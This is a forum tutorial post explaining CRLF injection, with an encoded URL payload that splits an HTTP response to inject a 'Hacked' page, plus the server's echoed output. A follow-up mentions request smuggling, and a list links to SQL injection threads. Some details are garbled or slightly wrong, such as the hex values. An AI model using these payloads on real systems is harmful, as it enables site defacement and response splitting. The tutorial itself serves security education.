CRLF Injection - Manipulating an HTTP Request
CRLF Injection - Manipulating an HTTP Request

Credits: RootTheSystem @ IntoSec

What Does CRLF Mean?It's shortened of "Carriage Return and Line Feed". These are the names of the characters we're going to inject.

Code [No Highlight]:

Carriage Return -> \r
Line Feed (New Line) -> \n

Looks familiar right?
When we push the Enter/Return button on our keyboard everytime, these characters been sending to proccessor for passing to a new line.

Extra Information: Equalivent of these characters in hexadecimal are 0A and 0D.

Now lets see an HTTP request.

User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
This is a simple HTTP request with using GET method. We have a parameter that we can manipulate.

So if life gives us lemons, we'll make a lemonade.
Lets manipulate that piece of shit.

We'll inject a web response using CRLF characters, so the server will echo back our response. Then our web browser will act it as an actual response and show our index. Confused? Let me give an example for you.

Let's add our exploit to URL and see what happens.<center><h1>Hacked</h1></center>%20HTTP/1.1

Now our request will be like this;
Content-Type:%20text/html%0D%0A%0D%0A<center><h1>Hacked</h1></center>%20HTTP/1.1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0

And the server echoes it back to us..
HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Date: Wed, 01 Jun 2011 14:59:30 GMT
Allow: GET
Connection: close

HTTP/1.1 200 OK
Content-Type: text/html

<center><h1>Hacked</h1></center> HTTP/1.1

Our browser treated our injected response like an actual response and BAM! Our index appeared in the page.

More info:
This is a pretty rare attack, it died out like a decade ago. Though, request smuggling (something enabled by CRLF injection) has seen a revival in the past year. Though the form of HTTP Desync attacks, presented at last years Defcon and Blackhat conferences.

If you're looking for a more modern attack that can be used to do something similar, check it out.

- Defcon presentation:
- Blackhat Slides:
- Portswigger Academy Labs -

Possibly Related Threads…
Thread Author Replies Views Last Post
  [Tutorial] Request header MySQL injection using netcat and burp suite Insider 0 2,147 06-16-2020, 02:53 AM
Last Post: Insider
  [SSI] Server-Side Includes Injection. [Tutorial] Insider 4 4,710 03-27-2020, 04:55 PM
Last Post: Insider
  Second Order SQL Injection Attacks thunder 1 2,997 05-20-2019, 01:06 PM
Last Post: Insider
  Re-posted and Updated [Complete MySQL Injection] Insider 5 15,098 04-28-2019, 09:46 PM
Last Post: thunder